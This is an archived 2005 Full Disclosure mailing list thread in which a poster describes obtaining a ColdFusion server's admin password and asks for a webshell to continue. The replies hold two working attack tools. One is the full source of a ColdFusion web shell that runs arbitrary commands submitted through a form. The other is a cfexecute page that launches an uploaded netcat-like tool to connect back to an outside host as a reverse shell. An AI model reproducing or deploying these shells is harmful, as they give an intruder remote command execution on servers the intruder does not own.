Full Disclosure mailing list archives
Re: coldfusion pentest
From: "fatb" <fatb () security zz ha cn>
Date: Tue, 10 May 2005 17:19:59 +0800
thx :)
the script from securiteam was from Kurt Grutzmacher originally,it could not run in my box
and Im successful got a working shell by uploading a nc like tool and use the following script to run it
<html>
<body>
<cfexecute name="D:\haha.exe"
arguments="-connect 1.1.1. 9999"
timeout="20">
</cfexecute>
</body>
</html>
no matter how,I thought many guys who like me need a working cf webshell,because the upload script do not allow us to
upload exe or some other kinds of files
----- Original Message -----
From: "Javier Reoyo" <javier.reoyo () interdominios com>
To: <full-disclosure () lists grok org uk>
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest
Hi fatb, this is from mailing of securiteam. Try it. ColdFusion Web Shell ------------------------------------------------------------------------ SUMMARY DETAILS The following source code will generate a web based shell whenever it is executed under the ColdFusion environment. Tool source code: < html> < body> < cfoutput> < table> < form method="POST" action="cfexec.cfm"> < tr> < td>Command:</td> < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td> </tr> < tr> < td>Options:</td> < td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td> </tr> < tr> < td>Timeout:</td> < td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5" </cfif> > </td> </tr> </table> < input type=submit value="Exec" > </FORM> < cfsavecontent variable="myVar"> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> </cfexecute> </cfsavecontent> < pre> #myVar# </pre> </cfoutput> </body> </html> ADDITIONAL INFORMATION The information has been provided by <mailto:grutz () jingojango net> Kurt Grutzmacher. ======================================== ----- Original Message ----- From: "fatb" <fatb () security zz ha cn> To: <pen-test () securityfocus com> Cc: <full-disclosure () lists grok org uk> Sent: Tuesday, May 10, 2005 4:43 AM Subject: [Full-disclosure] coldfusion pentestHi all guys I've successed get the admin's passwd of the web interface and I can upload any kinds of files to the server the server is running coldfusion 4.5 with iis 5.0 but I can not find a coldfusion webshell to continue anybody could be kind enough to send me a working coldfusion webshell thx in advanced!---------------------------------------------------------------------------- ----_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- coldfusion pentest fatb (May 09)
- Re: coldfusion pentest Kurt Grutzmacher (May 09)
- Re: coldfusion pentest Frederic Charpentier (May 10)
- Re: coldfusion pentest Javier Reoyo (May 10)
- Re: coldfusion pentest fatb (May 10)
- Re: coldfusion pentest fatb (May 10)